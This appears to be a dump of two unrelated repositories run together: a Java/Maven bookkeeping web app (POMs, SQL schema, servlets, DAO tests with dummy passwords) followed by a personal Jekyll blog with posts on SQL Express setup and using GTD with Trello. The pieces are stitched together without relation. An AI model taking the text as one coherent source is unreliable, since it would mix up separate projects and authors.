<version>1.0-SNAPSHOT</version>
</dependency>
<dependency>
<groupId>ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.service</groupId>
<artifactId>bookkeeper-service</artifactId>
<version>1.0-SNAPSHOT</version>
</dependency>
<dependency>
<groupId>ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.webapp</groupId>
<artifactId>bookkeeper-webapp</artifactId>
<version>1.0-SNAPSHOT</version>
</dependency>
<dependency>
<groupId>commons-io</groupId>
<artifactId>commons-io</artifactId>
<version>${commons-io.version}</version>
</dependency>
<dependency>
<groupId>org.mindrot</groupId>
<artifactId>jbcrypt</artifactId>
<version>${jbcrypt.version}</version>
</dependency>
<!-- WEB -->
<dependency>
<groupId>javax.servlet</groupId>
<artifactId>javax.servlet-api</artifactId>
<version>${servlet-api.version}</version>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>org.freemarker</groupId>
<artifactId>freemarker</artifactId>
<version>${freemarker.version}</version>
</dependency>
<!-- JDBC -->
<dependency>
<groupId>org.hsqldb</groupId>
<artifactId>hsqldb</artifactId>
<version>${hsqldb.version}</version>
</dependency>
<dependency>
<groupId>org.hsqldb</groupId>
<artifactId>sqltool</artifactId>
<version>${hsqldb.sqltool.version}</version>
<scope>test</scope>
</dependency>
<dependency>
<groupId>com.zaxxer</groupId>
<artifactId>HikariCP</artifactId>
<version>${hikari.version}</version>
</dependency>
<!-- Logging -->
<dependency>
<groupId>log4j</groupId>
<artifactId>log4j</artifactId>
<version>${log4j.version}</version>
</dependency>
<!-- Test -->
<dependency>
<groupId>junit</groupId>
<artifactId>junit</artifactId>
<version>${junit.version}</version>
<scope>test</scope>
</dependency>
<dependency>
<groupId>org.mockito</groupId>
<artifactId>mockito-all</artifactId>
<version>${mockito.version}</version>
<scope>test</scope>
</dependency>
<dependency>
<groupId>org.powermock</groupId>
<artifactId>powermock-module-junit4</artifactId>
<version>${powermock.version}</version>
<scope>test</scope>
</dependency>
<dependency>
<groupId>org.powermock</groupId>
<artifactId>powermock-api-mockito</artifactId>
<version>${powermock.version}</version>
<scope>test</scope>
</dependency>
</dependencies>
</dependencyManagement>
<build>
<pluginManagement>
<plugins>
<plugin>
<groupId>org.eclipse.jetty</groupId>
<artifactId>jetty-maven-plugin</artifactId>
<version>9.3.7.v20160115</version>
<!-- http://www.eclipse.org/jetty/documentation/current/jetty-maven-plugin.html -->
<configuration>
<httpConnector>
<port>8081</port>
</httpConnector>
</configuration>
</plugin>
</plugins>
</pluginManagement>
</build>
</project>
<file_sep>INSERT INTO CATEGORY (NAME)
VALUES ('Аренда'),
('Другое'),
('Зарплата'),
('Коммунальные Платежи'),
('Налоги'),
('Питание'),
('Покупки'),
('Работа'),
('Развлечения'),
('Связь'),
('Стипендия'),
('Транспорт');
<file_sep>package ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.webapp.controllers;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.model.AbstractModel;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.model.Record;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.service.CategoryService;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.service.RecordService;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.service.impl.CategoryServiceImpl;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.service.impl.RecordServiceImpl;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.util.Calendar;
import java.util.List;
public class HomeController extends AbstractController {
@Override
protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
RecordService recordService = new RecordServiceImpl();
String login = req.getSession().getAttribute("login").toString();
int month = Calendar.getInstance().get(Calendar.MONTH) + 1;
req.setAttribute("balance", recordService.getBalance(login));
req.setAttribute("income", recordService.getMonthlyIncome(login, month));
req.setAttribute("expenditure", recordService.getMonthlyExpenditure(login, month));
req.setAttribute("records", recordService.get(login));
req.setAttribute("incomeData", recordService.getMonthlyIncomeData(login, month));
req.setAttribute("expenditureData", recordService.getMonthlyExpenditureData(login, month));
req.getRequestDispatcher("home.ftl").forward(req, resp);
}
}
<file_sep>package ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.webapp.controllers;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.model.Client;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.service.ClientService;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.service.impl.ClientServiceImpl;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
public class PasswordController extends AbstractController {
@Override
protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
ClientService clientService = new ClientServiceImpl();
String login = req.getSession().getAttribute("login").toString();
String password = req.getParameter("password");
String newPassword = req.getParameter("newPassword");
Client client = clientService.find(login, password);
if (client != null) {
clientService.updatePassword(client, newPassword);
String check = "Пароль успешно обновлен!";
req.setAttribute("check", check);
req.getRequestDispatcher("settings.ftl").forward(req, resp);
} else {
String error = "Неверный старый пароль!";
req.setAttribute("error", error);
req.getRequestDispatcher("settings.ftl").forward(req, resp);
}
}
}
<file_sep>package ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.dao;
import org.junit.Test;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.dao.hsqldb.ClientDaoHsqldb;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.model.Client;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.model.enums.Gender;
import java.util.LinkedList;
import static org.junit.Assert.*;
public class ClientDaoHsqldbTest extends GenericDaoHsqldbTest<Client> {
public final String NOT_EXISTING_LOGIN = "########";
@Override
public void setUp() throws Exception {
super.setUp();
}
@Override
public void initDao() {
this.dao = new ClientDaoHsqldb();
}
@Override
public void createTable() {
this.table = new LinkedList<>();
table.add(new Client(0L, "login", "password", Gender.M));
table.add(new Client(1L, "client", "qwerty", Gender.F));
}
@Override
public Client objectToUpdate() {
return new Client(0L, "newLogin", "newPassword", Gender.M);
}
@Override
public Client nonexistentObject() {
return new Client(NOT_EXISTING_ID, "login", "password", Gender.M);
}
@Override
public Client newObject() {
return new Client("A", "A", Gender.F);
}
@Test
public void testGetExistingByLogin() {
Client client = ((ClientDao) dao).get("login");
assertEquals(table.get(0), client);
}
@Test
public void testGetNotExistingByLogin() {
assertNull(((ClientDao) dao).get(NOT_EXISTING_LOGIN));
}
@Test(expected = DataAccessException.class)
public void testGetByLoginWithDataAccessException() throws Exception {
((ClientDao) daoWithSQLException).get("client");
}
}
<file_sep>CREATE TABLE CLIENT (
ID BIGINT IDENTITY CONSTRAINT PK_USER PRIMARY KEY,
LOGIN VARCHAR(32) NOT NULL,
PASSWORD VARCHAR(128) NOT NULL,
GENDER CHAR CHECK (GENDER IN ('M', 'F'))
);
CREATE TABLE CATEGORY (
ID BIGINT IDENTITY CONSTRAINT PK_CATEGORY PRIMARY KEY,
NAME VARCHAR(32)
);
CREATE TABLE RECORD (
ID BIGINT IDENTITY CONSTRAINT PK_RECORD PRIMARY KEY,
CLIENT_ID BIGINT NOT NULL,
CATEGORY_ID BIGINT NOT NULL,
TYPE VARCHAR(16) CHECK (TYPE IN ('INCOME', 'EXPENDITURE')),
AMOUNT INTEGER NOT NULL CHECK (RECORD.AMOUNT > 0),
DESCRIPTION VARCHAR(256),
CREATION_DATE DATE NOT NULL,
CONSTRAINT FK_CLIENT FOREIGN KEY (CLIENT_ID) REFERENCES CLIENT (ID)
ON DELETE CASCADE,
CONSTRAINT FK_CATEGORY FOREIGN KEY (CATEGORY_ID) REFERENCES CATEGORY (ID)
ON DELETE CASCADE
);<file_sep>INSERT INTO CLIENT (LOGIN, PASSWORD, GENDER)
VALUES ('login', '<PASSWORD>', 'M'),
('client', 'qwerty', 'F');
INSERT INTO CATEGORY (NAME)
VALUES ('category0'),
('category1');
INSERT INTO RECORD (CLIENT_ID, CATEGORY_ID, TYPE, AMOUNT, DESCRIPTION, CREATION_DATE)
VALUES (0, 0, 'INCOME', 100, 'description0', '2016-01-01'),
(0, 1, 'INCOME', 200, 'description1', '2016-01-02'),
(1, 1, 'EXPENDITURE', 100, 'description2', '2016-01-01'),
(1, 0, 'EXPENDITURE', 200, 'description3', '2016-01-02');
<file_sep>package ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.service;
/**
* Signals that added client already exists.
*/
public class ClientAlreadyExistsException extends Exception {
public ClientAlreadyExistsException(String message) {
super(message);
}
}
<file_sep>package ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.service;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.model.Category;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.model.Coordinate;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.model.Record;
import java.util.List;
import java.util.Map;
/**
* Record Service interface.
* Provides logic to operate on the data sent to and from the DAO and the client.
*/
public interface RecordService {
/**
* Creates specified record.
*
* @param record the record to create
* @return created record's id
*/
long create(Record record);
/**
* Returns all records for specified by login client.
*
* @param login the client's login of records to find
* @return list contains all records of specified by login client, may be empty
*/
List<Record> get(String login);
/**
* Returns current balance for specified by login client.
*
* @param login the client's login
* @return current balance for specified by login client
*/
Long getBalance(String login);
/**
* Returns monthly income for specified month of specified by login client.
*
* @param login the client's login
* @param month number of month
* @return amount of incomes for a specified month of specified by login client
*/
Long getMonthlyIncome(String login, int month);
/**
* Returns all income records of specified by login client.
*
* @param login the client's login
* @return list of all income records of specified by login client
*/
List<Record> getIncomeList(String login);
/**
* Returns all expenditures records of specified by login client.
*
* @param login the client's login
* @return list of all expenditures records of specified by login client
*/
List<Record> getExpenditureList(String login);
/**
* Returns monthly expenditure for specified month of specified by login client.
*
* @param login the client's login
* @param month number of month
* @return amount of expenditure for a specified month of specified by login client
*/
Long getMonthlyExpenditure(String login, int month);
/**
* Removes the specified by id record.
*
* @param id the identifier (primary key) of the record to remove
* @return {@code true} if object removed;
* {@code false} otherwise
*/
boolean remove(Long id);
/**
* Returns map for specified by login client containing monthly income of this person for each category.
*
* @param login the client's login
* @param month number of month
* @return map, where keys - names of categories and values - monthly income for appropriate category
*/
Map<String, Long> getMonthlyIncomeData(String login, int month);
/**
* Returns map for specified by login client containing monthly expenditure of this person for each category.
*
* @param login the client's login
* @param month number of month
* @return map, where keys - names of categories and values - monthly expenditure for appropriate category
*/
Map<String, Long> getMonthlyExpenditureData(String login, int month);
/**
* Returns total income of specified by login client.
*
* @param login the client's login
* @return total income of specified by login client
*/
Long getTotalIncome(String login);
/**
* Returns total expenditure of specified by login client.
*
* @param login the client's login
* @return total expenditure of specified by login client
*/
Long getTotalExpenditure(String login);
/**
* Returns total average income of specified by login client.
*
* @param login the client's login
* @return total average income of specified by login client
*/
Long getTotalAverageIncome(String login);
/**
* Returns total average expenditure of specified by login client.
*
* @param login the client's login
* @return total average expenditure of specified by login client
*/
Long getTotalAverageExpenditure(String login);
/**
* Returns the list of pairs contains months and balances their respective for specified by login client.
* @param login the client's login
* @return list of pairs contains months and balances their respective for specified by login client, may be empty
*
* @see Coordinate
*/
List<Coordinate> getTotalMonthlyBalanceData(String login);
}
<file_sep>package ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.model;
/**
* Represents the Coordinate.
*/
public class Coordinate {
private String x;
private Long y;
public Coordinate(String x, Long y) {
this.x = x;
this.y = y;
}
public String getX() {
return x;
}
public void setX(String x) {
this.x = x;
}
public Long getY() {
return y;
}
public void setY(Long y) {
this.y = y;
}
@Override
public String toString() {
return "Coordinate{" +
"x='" + x + '\'' +
", y=" + y +
'}';
}
}
<file_sep>package ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.dao.hsqldb;
import org.apache.log4j.Logger;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.dao.CategoryDao;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.dao.DataAccessException;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.model.Category;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.LinkedList;
import java.util.List;
public class CategoryDaoHsqldb extends GenericDaoHsqldb<Category> implements CategoryDao {
final static Logger log = Logger.getLogger(CategoryDaoHsqldb.class.getName());
@Override
protected String getTableName() {
return "CATEGORY";
}
@Override
protected String getSelectByIdQuery() {
return "SELECT ID, NAME " +
"FROM CATEGORY WHERE ID = ?";
}
@Override
protected String getSelectAllQuery() {
return "SELECT ID, NAME " +
"FROM CATEGORY";
}
@Override
protected String getUpdateQuery() {
return "UPDATE CATEGORY " +
"SET NAME = ?" +
"WHERE ID = ?";
}
@Override
protected String getAddQuery() {
return "INSERT INTO CATEGORY (NAME) " +
"VALUES (?)";
}
@Override
protected List<Category> parseResultSet(ResultSet rs) {
List<Category> list = new LinkedList<>();
try {
while (rs.next()) {
list.add(new Category(rs.getLong("ID"), rs.getString("NAME")));
}
} catch (SQLException e) {
String msg = "Error parsing ResultSet";
log.error(msg);
throw new DataAccessException(msg, e);
}
return list;
}
@Override
protected void prepareStatementForUpdate(PreparedStatement pstmt, Category model) {
try {
pstmt.setString(1, model.getName());
pstmt.setLong(2, model.getId());
} catch (SQLException e) {
String msg = "Error preparing statement for update";
log.error(msg);
throw new DataAccessException(msg, e);
}
}
@Override
protected void prepareStatementForAdd(PreparedStatement pstmt, Category model) {
try {
pstmt.setString(1, model.getName());
} catch (SQLException e) {
String msg = "Error preparing statement for add";
log.error(msg);
throw new DataAccessException(msg, e);
}
}
}
<file_sep>package ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.webapp.controllers;
import org.mindrot.jbcrypt.BCrypt;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.model.Client;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.model.enums.Gender;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.service.ClientAlreadyExistsException;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.service.ClientService;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.service.impl.ClientServiceImpl;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
public class RegistrationController extends AbstractController {
@Override
protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
req.getRequestDispatcher("registration.ftl").forward(req, resp);
}
@Override
protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
ClientService clientService = new ClientServiceImpl();
Client client = parseParameters(req);
try {
clientService.create(client);
resp.sendRedirect("/home");
} catch (ClientAlreadyExistsException e) {
String error = "Пользователь с введенным логином уже существует";
req.setAttribute("error", error);
req.getRequestDispatcher("registration.ftl").forward(req, resp);
}
}
private Client parseParameters(HttpServletRequest req) {
Client client = new Client();
client.setLogin(req.getParameter("login"));
client.setPassword(BCrypt.hashpw(req.getParameter("password"), BCrypt.gensalt()));
client.setGender(Gender.valueOf(req.getParameter("gender")));
return client;
}
}
<file_sep>package ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.webapp.filters;
import org.apache.log4j.Logger;
import javax.servlet.*;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.text.DateFormat;
import java.util.Date;
import java.util.Locale;
import java.util.TimeZone;
/**
* Writes log in Common Logging format.
*/
public class LogFilter implements Filter {
private static final Logger log = Logger.getLogger(LogFilter.class);
private Locale locale;
private TimeZone timezone;
@Override
public void init(FilterConfig filterConfig) throws ServletException {
String language = filterConfig.getInitParameter("language");
this.locale = language != null ? new Locale(language) : Locale.getDefault();
String timezone = filterConfig.getInitParameter("timezone");
this.timezone = timezone != null ? TimeZone.getTimeZone(timezone) : TimeZone.getDefault();
}
@Override
public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain)
throws IOException, ServletException {
Date reqDate = new Date();
DateFormat format = DateFormat.getDateTimeInstance(DateFormat.FULL, DateFormat.FULL, locale);
format.setTimeZone(timezone);
String date = format.format(reqDate);
if (!(servletRequest instanceof HttpServletRequest &&
servletResponse instanceof HttpServletResponse)) {
throw new ServletException("Non-HTTP requests are not supported");
}
HttpServletRequest request = (HttpServletRequest) servletRequest;
HttpServletResponse response = (HttpServletResponse) servletResponse;
String ip = servletRequest.getRemoteAddr();
String username = request.getRemoteUser();
if (username == null) {
username = "-";
}
String method = request.getMethod();
String uri = request.getRequestURI();
String protocol = request.getProtocol();
filterChain.doFilter(servletRequest, servletResponse);
Integer status = response.getStatus();
String contentLength = response.getHeader("Content-Length");
if (contentLength == null) {
contentLength = "-";
}
log.info(String.format("%s - %s [%s] \"%s %s %s\" %d %s", ip, username, date, method, uri, protocol, status,
contentLength));
}
@Override
public void destroy() {
}
}
<file_sep>DROP TABLE IF EXISTS RECORD;
DROP TABLE IF EXISTS CATEGORY;
DROP TABLE IF EXISTS CLIENT;<file_sep><project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0
http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<groupId>ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.service</groupId>
<artifactId>bookkeeper-service</artifactId>
<version>1.0-SNAPSHOT</version>
<name>Bookkeeper Service</name>
<parent>
<groupId>ru.kpfu.itis.fujitsu.lzakharov.bookkeeper</groupId>
<artifactId>bookkeeper</artifactId>
<version>1.0-SNAPSHOT</version>
</parent>
<dependencies>
<dependency>
<groupId>ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.model</groupId>
<artifactId>bookkeeper-model</artifactId>
</dependency>
<dependency>
<groupId>ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.dao</groupId>
<artifactId>bookkeeper-dao</artifactId>
</dependency>
<dependency>
<groupId>org.mindrot</groupId>
<artifactId>jbcrypt</artifactId>
</dependency>
<dependency>
<groupId>junit</groupId>
<artifactId>junit</artifactId>
</dependency>
<dependency>
<groupId>org.mockito</groupId>
<artifactId>mockito-all</artifactId>
</dependency>
</dependencies>
</project>
<file_sep><project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0
http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<groupId>ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.dao</groupId>
<artifactId>bookkeeper-dao</artifactId>
<version>1.0-SNAPSHOT</version>
<name>Bookkeeper DAO</name>
<parent>
<groupId>ru.kpfu.itis.fujitsu.lzakharov.bookkeeper</groupId>
<artifactId>bookkeeper</artifactId>
<version>1.0-SNAPSHOT</version>
</parent>
<dependencies>
<dependency>
<groupId>ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.model</groupId>
<artifactId>bookkeeper-model</artifactId>
</dependency>
<dependency>
<groupId>org.hsqldb</groupId>
<artifactId>hsqldb</artifactId>
</dependency>
<dependency>
<groupId>org.hsqldb</groupId>
<artifactId>sqltool</artifactId>
<scope>test</scope>
</dependency>
<dependency>
<groupId>com.zaxxer</groupId>
<artifactId>HikariCP</artifactId>
</dependency>
<dependency>
<groupId>commons-io</groupId>
<artifactId>commons-io</artifactId>
<scope>test</scope>
</dependency>
<dependency>
<groupId>log4j</groupId>
<artifactId>log4j</artifactId>
</dependency>
<dependency>
<groupId>junit</groupId>
<artifactId>junit</artifactId>
</dependency>
<dependency>
<groupId>org.mockito</groupId>
<artifactId>mockito-all</artifactId>
</dependency>
<dependency>
<groupId>org.powermock</groupId>
<artifactId>powermock-module-junit4</artifactId>
</dependency>
<dependency>
<groupId>org.powermock</groupId>
<artifactId>powermock-api-mockito</artifactId>
</dependency>
</dependencies>
</project>
<file_sep><project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0
http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<groupId>ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.webapp</groupId>
<artifactId>bookkeeper-webapp</artifactId>
<version>1.0-SNAPSHOT</version>
<name>Bookkeeper Web Application</name>
<packaging>war</packaging>
<properties>
<web.context>bookkeeper</web.context>
</properties>
<parent>
<groupId>ru.kpfu.itis.fujitsu.lzakharov.bookkeeper</groupId>
<artifactId>bookkeeper</artifactId>
<version>1.0-SNAPSHOT</version>
</parent>
<dependencies>
<dependency>
<groupId>ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.service</groupId>
<artifactId>bookkeeper-service</artifactId>
</dependency>
<dependency>
<groupId>org.mindrot</groupId>
<artifactId>jbcrypt</artifactId>
<version>${jbcrypt.version}</version>
</dependency>
<dependency>
<groupId>javax.servlet</groupId>
<artifactId>javax.servlet-api</artifactId>
</dependency>
<dependency>
<groupId>org.freemarker</groupId>
<artifactId>freemarker</artifactId>
</dependency>
<dependency>
<groupId>org.hsqldb</groupId>
<artifactId>hsqldb</artifactId>
</dependency>
<dependency>
<groupId>log4j</groupId>
<artifactId>log4j</artifactId>
</dependency>
</dependencies>
<build>
<plugins>
<plugin>
<groupId>org.eclipse.jetty</groupId>
<artifactId>jetty-maven-plugin</artifactId>
</plugin>
</plugins>
</build>
</project>
<file_sep>jdbc.url=jdbc:hsqldb:file:/Users/lzakharov/Documents/Libraries/hsqldb-2.3.3/Databases/bookkeeperdb/bookkeeper
jdbc.username=SA
jdbc.password=
jdbc.pool.idleTimeout=0
jdbc.pool.maxLifetime=0
jdbc.pool.maximumPoolSize=3
<file_sep>package ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.dao;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.dao.hsqldb.CategoryDaoHsqldb;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.model.Category;
import java.util.LinkedList;
public class CategoryDaoHsqldbTest extends GenericDaoHsqldbTest<Category> {
@Override
public void initDao() {
this.dao = new CategoryDaoHsqldb();
}
@Override
public void createTable() {
this.table = new LinkedList<>();
this.table.add(new Category(0L, "category0"));
this.table.add(new Category(1L, "category1"));
}
@Override
public Category objectToUpdate() {
return new Category(0L, "newCategory");
}
@Override
public Category nonexistentObject() {
return new Category(NOT_EXISTING_ID, "category");
}
@Override
public Category newObject() {
return new Category("newCategory");
}
}
<file_sep>package ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.model.enums;
/**
* Represents the gender.
*
* M - Male;
* F - Female.
*/
public enum Gender {
M, F
}
<file_sep>package ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.service.impl;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.dao.CategoryDao;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.dao.hsqldb.CategoryDaoHsqldb;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.model.Category;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.service.CategoryService;
import java.util.List;
public class CategoryServiceImpl implements CategoryService {
private CategoryDao categoryDao;
public CategoryServiceImpl() {
this.categoryDao = new CategoryDaoHsqldb();
}
public void setCategoryDao(CategoryDao categoryDao) {
this.categoryDao = categoryDao;
}
@Override
public List<Category> getAll() {
return categoryDao.getAll();
}
}
| 0738f602919bc6191272bce038abf72aeab11ac5 | [
"Java",
"Maven POM",
"SQL",
"INI"
] | 23 | Java | levzakharov/bookkeeper | 50066cb8e744e29ca5f3aeb1f863787644cc034d | fd59900a15453482fd496f5669f06f984cffa53a |
refs/heads/master | <repo_name>FeedFestival/Analiza-Sintactica-Romana<file_sep>/Assets/scripts/QuestionText.cs
using System.Collections;
using System.Collections.Generic;
using System.Linq;
using System.Text.RegularExpressions;
using UnityEngine;
using UnityEngine.UI;
public class QuestionText : MonoBehaviour
{
public Text Question;
public float TimeToDisplayTheQuestion;
private string[] _words;
private int _wordIndex;
void Start()
{
_words = GetWords(Question.text);
StartCoroutine(DisplayText());
}
IEnumerator DisplayText()
{
yield return new WaitForSeconds(TimeToDisplayTheQuestion / _words.Length);
_wordIndex++;
if (_wordIndex != _words.Length)
StartCoroutine(DisplayText());
}
static string[] GetWords(string input)
{
MatchCollection matches = Regex.Matches(input, @"\b[\w']*\b");
var words = from m in matches.Cast<Match>()
where !string.IsNullOrEmpty(m.Value)
select TrimSuffix(m.Value);
return words.ToArray();
}
static string TrimSuffix(string word)
{
int apostropheLocation = word.IndexOf('\'');
if (apostropheLocation != -1)
{
word = word.Substring(0, apostropheLocation);
}
return word;
}
}
| acf6506686f7e8e39f30ae6aa3bb31832a4d8e2b | [
"C#"
] | 1 | C# | FeedFestival/Analiza-Sintactica-Romana | 1d7fb794b8d57bed9e9c47b83098ac674d7de6d3 | 3dfd3db8c3d7550362055cc96a1b4f05f29b3acd |
refs/heads/main | <file_sep>---
title: "Drama"
date: 2004-01-19
slashdot_url: https://slashdot.org/journal/58867/drama
---
<p>I am now associated with this bunch of <a href="http://www.twyrusdrama.org.uk/">t.a.r.t.s</a></p>
<p>Having helped out backstage with Treasure Island. Which was great fun.</p>
<file_sep>---
layout: post
title: Blog refresh - bye bye wordpress, hello jekyll
categories: [meta]
---
The old blog is gone. Move over wordpress, long live [github
pages](https://pages.github.com/).
I haven't redirected the old subdomain or urls, but the stats tell me I had no
visitors so meh. If you want something let me know and I'll repost it.
The new theme is : [Reverie](https://github.com/amitmerchant1990/reverie).
The full history and source of this blog is available in the open at
<https://github.com/timabell/timwise.co.uk>.
<file_sep>---
title: "Balls!"
date: 2004-02-14
slashdot_url: https://slashdot.org/journal/61964/balls
---
<p>Yay! My snooker table is here. Anyone fancy a game? Shame I haven't got room to put it up at the moment.</p>
<file_sep>---
layout: post
title: Enabling TCP/IP in SQL Express 2008 R2
date: '2012-05-22T11:10:00.001Z'
author: <NAME>
tags:
- howto
- sql server
modified_time: '2012-05-22T11:10:17.222Z'
thumbnail: http://3.bp.blogspot.com/-bcotqeE-qFo/T7tzqnDyBfI/AAAAAAAAAFc/sjBLaus6uu4/s72-c/sql-express-tcp-ip.png
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-7356884620087853089
blogger_orig_url: https://timwise.blogspot.com/2012/05/enabling-tcpip-in-sql-express-2008-r2.html
---
Programs > .. R2 > SQL Server Configuration Manager
Network config > Protocols > tcp/ip > enable & properties

Clear the dynamic port under IPAll
Set the TCP Port to 1433 (which is the standard sql server port).
You can then connect to "localhost" (with no instance specified) in management studio.
refs:
* [https://vgoes.wordpress.com/2007/06/05/jdbc-to-sql-server-express/](https://vgoes.wordpress.com/2007/06/05/jdbc-to-sql-server-express/)
<file_sep>---
title: Effective GTD with Trello
layout: post
---
* Learn how I've refined the GTD process with Trello for modern living.
* Get a template GTD board to kick-start your own.
GTD+Trello has really helped sooth my neurotic tendencies around todo lists. I'm often startled by starting off thinking I have more than I could ever achieve and then getting all my top priorities done in one sitting and being able to truly relax afterwards. No more nagging feeling there's something urgent at the bottom of the pile of papers somewhere.
## What is GTD?
Getting Things Done <https://en.wikipedia.org/wiki/Getting_Things_Done> is an old but effective method for organising the flood of todos that enter your life in many forms. We need it now more than ever in our infinitely connected world. And as a middle-aged working parent I need it now more than I ever did.
The point of GTD is to eliminate all the other places that you might have hidden todo lists such as
* unread emails
* your memory
* phone notes
* bits of paper
* phone screenshots
* other unstructured todo lists (Trello, Evernote etc. let me know what you use now that isn't working for you and I'll add it to the list)
And then to make your todo list something that you can almost mindlessly churn through, eliminating huge task switching costs caused by badly defined and variably sized tasks.
## Trello + GTD
The original GTD method involved bits of paper. But now we have Trello, which is an excellent fit for GTD with its cards, lists and many integrations. There's a great write-up of using Trello for GTD here: <https://blog.trello.com/gtd-getting-things-done-maximizing-productivity-trello> which I suggest you go and read first. It's how I got started, however I found I was still left building my own process and set of lists from there before it really worked for me.
Trello is great for GTD because:
* You can set up lists how you like
* There are apps so you have it everywhere
* You can forward emails to it (yay, inbox zero at last)
* It supports attaching pictures, PDFs etc.
* You can add checklists, due dates, date-stamped comments etc.
* Drag-n-drop sorting and moving of cards
* Buttons for archive / move on the cards
* A lovely cross-platform interface
* It's free!
## Disclaimer
Neither GTD or Trello can give you more hours in the day, help you focus, get you to do things you really don't want to do, or make your tax return go away. This still requires putting the work in. Having said that, at least you will know you haven't just forgotten anything really important, it's just a bit stuck on your list. Personally with life as it is for me now I never get close to the weekly/daily GTD schedule laid out below, but that doesn't make it less valuable.
If you are looking at GTD for the same reasons as I did then beware ["the efficiency trap"](https://www.wsj.com/articles/escaping-the-efficiency-trapand-finding-some-peace-of-mind-11628262751)
## My GTD Method
Here's my actual GTD board (minus details) to give you an idea of what it looks like. You might be able to see I have far too much in Inbox and Action items as is often the case, but it doesn't take too long to clear down when I actually focus on it.

First you need to get everything you might have to do into your GTD board. Don't think too hard at this point, just ping everything to Trello and deal with it efficiently at your next GTD moment:
### Getting Everything to the Board
#### Emails
Forward emails to your GTD board "send-to-board" email address to get to inbox zero quickly. Make sure your GTD board email address is in your address book so you can just type "gtd" and hit send.

Using GTD instead of your unread email as a todo list makes inbox-zero possible again.
The subject line becomes the card title so edit that if you want. The body of the email becomes the card description so you can add to that too.
#### Web based tasks
Install [AddToAny](https://www.addtoany.com/) to send any webpage from Firefox to your GTD inbox.

#### Documents, physical objects, pictures, screenshots
